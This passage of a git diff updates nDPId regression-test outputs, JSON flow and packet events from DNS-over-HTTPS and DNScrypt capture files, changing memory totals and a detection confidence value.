+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7580000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":577,"packets-processed":577,"total-skipped-flows":0,"total-l4-payload-len":185420,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":36,"total-updates":0,"current-active-flows":0,"total-active-flows":34,"total-idle-flows":34,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":243,"global_ts_msec":946739888204} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 577/577 @@ -249,9 +249,9 @@ ~~ total active/idle flows...: 34/34 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6067668 bytes -~~ total memory freed........: 6067668 bytes -~~ total allocations/frees...: 118961/118961 +~~ total memory allocated....: 6201302 bytes +~~ total memory freed........: 6201302 bytes +~~ total allocations/frees...: 121723/121723 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 4713 chars diff --git a/test/results/dnscrypt-v2.pcap.out b/test/results/dnscrypt-v2.pcap.out index bba683351..d3ae4a566 100644 --- a/test/results/dnscrypt-v2.pcap.out +++ b/test/results/dnscrypt-v2.pcap.out @@ -3,18 +3,18 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760521313,"flow_last_seen":946760521313,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760521313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01919{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946760521313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760521313,"pkt":"AABeAAEK6qmpVXFVCABFAARcbhBAALERNCZ\/AAABfwAAApb6FOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQpQUH1mr6e8OCu\/fibn8cYTAvsRcNZA8\/lTdO1zXx64xZvGw9jDVohyuD42K8UoR60NkNdqxmDm0qVliFWXizmljTn2lD7CTHoYDdzqjjkHmHHUYe7NejwHo7UzJLYj4uUoMZ5OBbpbxqfekl3zx\/Y\/4Zdyfk6\/03lvMbG9F2W\/akMw4XwHvq2g20\/z7ROpAn9pbnoIPgkT0bVLMUloa6KCu+fPabNALYQCzXjw1dWf3V3HgmcswkwsHKRU4IqCA\/69xcDmnZfgajXBSpNTdHGZU3HrpU7Y+zKoXZQEmeLc30bXeW5a9kf14ALJr7nP37xAYcN4G1BzEhKbbjiDg1A8CDSXiipFooV7yrAiiDZFfq27wAKZRhDngTzeslBwu2i9MUBFZfRNYKakWYXb0zhir5\/O29uGdH+oix0VAlOhQ1zI2Iy777Cmv9swWs1wCBkrJE\/94M4tHF8XTS+kICmBd4\/\/oCbnlEOyxgE0tpl\/nt7We2odNwl1bEewLva0FOnwrRvhVpfaOoXJc9u0J1yVggsuxaSQHVALa0pkLJp+\/KL1C5ympFZjeFktaMfNQOPv5Z3ESCDKvkHzBBiVXNmZyBQJjVm8OJ2VxCOFxQRcEAfIQp56nl1CI6spURDZCsZVp2WuwyXhdsymxVlmsZMvMariZ7h1rbuSEhdHqejvERJd+oAjcCDcUCZYn75DUrNO01fMsDJFP9eRjUktxwy4\/sGlfHHZsXsBQsVS+zNosEiqeQlMFWbk\/CQC\/Iy+m8JNr48sNXZTfXlgESJMZXIJGI3ZhFWluGHRiSLjWQPEgvt0+8gtmgy\/Sb56ZYrX4M7I0sBjqZhkP6vZD63SReYDlzFMUXd7hqpdFD+DjTIU374ZDUKtowMci+TNbopqyz97shtgi2xwOH9hFddB1RkG4yQjJkESvH+dEwGDhiyuqu1jbA0SFR8P5u+YYRQ+42CE\/iBU+jTsoOwxLsuWVcddU3vstbXn6rqxHgTXYGQFfuQtZFvSdKWnmTw8z9w8zndi+uHY\/vuoYXfx78owiiwhQhGyfvFoeyz6rWetZHRBw8zdBPggojOpslDYBovfLfe36dR5k4GtMpkpWYRt2em7VCMyF\/XbQIJEmhp+Ako20cMzqWuCfInK3G1X2JqV5rUe\/hqwd4JCyxrYqNuTc0r7m\/tXkqg9Pt8Nefpg\/ArWfvW+92iTAzlNVO3aq1ykTtQZiIeO81hVzagjUmsfI9nbIftuGPqsEIReSMuv5dWv6UgqYAe4C\/Xx87KHRwvxYrw2wdoQQVmttjR1\/zLAosSHz6yXxjq3yFjyK9Klg3OqBxrG0xMTunO9JWWEVDj8mxnhWJ808mUKd\/9SGzIWV6hSgWaIDqMtm18GCQPG3sT0f23Y6zC5qmo="} 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946760521327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946760521327,"pkt":"6qmpVXFVLGv1oHfACABFAAEMLuFAADYR8aV\/AAACfwAAARTplvoA+BE2cjZmbnZXajgKUFB9Zq+nvDgrv35wwPFkkokFr1FaigO8H+CEw9XZ9v94iKYdvhofH7\/r0T3rultZ9ZuMYw63KPKpYNyj1i2Vz2KxAnu1y9OcbN8hOMoWFrn1y\/BrWeycOMWNW\/UytoGW9Utt69PEyNka4RcvHRab4iJ\/YjjMR75dgU4mnlrydsdtgAPjXq8XLISW7\/42LpWK7O03ro1N2Q0h\/PZQAkZ8Yr116m7rrS+wia4dqoRvx+npPzTL2uTXQZk6coE4bD7nXs83zCQTiFsawPIKEo\/Czq95ZoX+83ElbKp2Lf2x5F0tvUmYWWas"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760521327,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760521327,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605202,"flow_last_seen":946760605202,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760605202,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01903{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946760605202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760605202,"pkt":"AABeAAEK6qmpVXFVCABFAARcltdAALMRCV9\/AAABfwAAAqeDFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRfk4LvVMuzYHCM64aFNA6T05d8hUdeyA7alWJw86lEbUjUkUtbT59kH5jmUMy6TBNbA9cSZ8ylHF4RX6cVC46FgRWMG7UkBiuIGCYSDYj0qQHCgV\/uKPkd7y7W+9OzpH8mUK0FHIW++OejSvieZlNNJ7hSMqQWE6z3iyVzPN5bD2KljIJn1iUmfgz+QxSJuRx84RGS6ZLYT438yRBqXYq0Vwk3xAT2MdCKiMuYMGqjTyP8B2grnXj9xxXxku1yj6OtSn3nAOQMgpYIcCjgnWS0cRJegnnM5D0O11ZfcQB4Fewco0pEjSFK7kZnpZjtiHj5j7TxqMO4Vn4k86uxQk9GVEN2zODOYc\/yyQRJRQS1vdmwbB8pH1RY9RWIX7c72Uu8J9lT3tB12jgWk7JcvRj3kqUYiVaVTscNevFtQUPd0pSnuajXrJ+hzFBHsYRtQDq\/qTDyuwyCgb8nIkKE96dBEolcLL26\/EMH1RIcplKkl5QSamD4VBOpG8DQ1KIQd5gIQLhlPX6KKqy7L6Do2tx+7dCgtxx1E2Br5zMvuZ\/kHhX+MLJOr0\/iwBeAlPpj1PTcK\/rpOP\/M9aijTDmpjKLIyWYcCRi4HhnB137njSA378aWCbFQ7RmeSIy0aQhzqFaa24Ofa5nIsMouRW4f5GlNLyfxNzMEVOgMupxFBG2voNdFKwsRoKeLkMj7WOY2inFYOw5ZlvlEm8+KlPFlfAPPRaFc4wviLsHB1h5n0OE+4RJNAOIIQjqzgIlOSM8Nf6u6nK9U3brOit1rLsoNbz0kdvgGrYF8iE222nQnizwIIprECi+YiIB1JohhQC2SZBXTJZi6nmVjvNp1U7QtnqJmCDfn5dkvToJTtLdfNYaPdwYRqh9PCxdqOx4DZSEWB8Mcmvv2RlvIDRk4YB8sEcsvl8H3KjJrRLlS2VHOyhoRF4eQShnYQaWWTTPhLW1WnZkJv3V+hfXyWkKSlLqRNpdP6XlsM5ekn2bbYMJyF9X1PMYbcE30O7Cu2G1r8dj6Q3hhF0SdQ5eGuZYgYWN9RTyONhRRMvxQMrb9jKfwKGrdQlTE6utG21dom5hBW5JyJ8gXtHSffRdH1zebg16GOd\/Kdg8neHvERpHgJtjc6onWBEeYVMSOIgY3FsrOPw8Z+8m14x9gAOfHtLW669SkRJ\/5Oy1nHFue3eMdLOD17GsJC9ipo8Nt7h+s4mrZ48orMsFI5zdxcpuO5qIX7Jeo5cM7okkhYTz8e15mkxVdno5gBtUAf8t\/L2X1vjjlcGsVoQKrJmRP1jJTumUkNQcgjkM9fu5JPFOO495nbtE9aMELyNvGpZMayoVzo0osCoDkba4s3ZTHe2irNjakWpfqIdatMniQsiKVkXUcZgJzdhkXaFhlfKxLQ3rNM="} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946760605216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946760605216,"pkt":"6qmpVXFVLGv1oHfACABFAADMP0VAADYR4YF\/AAACfwAAARTpp4MAuJEqcjZmbnZXajj5OC71TLs2BwjOuGgg3QrBP5tprFLasOGCi79PkXAdV2PVq+xNqpM\/kysCzgq0+LOYozLThXw1WZc0FtoVVEapHJrtR+84oNppbLRDK7JMS7PVvGlgxZODr7UkO1B\/D0uRd283CHNw\/vIL9BRqAsong3oxZiw5zr2Y3a2cdTof4h\/tWWCDrx7A7RBVG\/GNrFPjnEGOMX+8J1XSUzpJoAL2W7tia8a8E6E="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 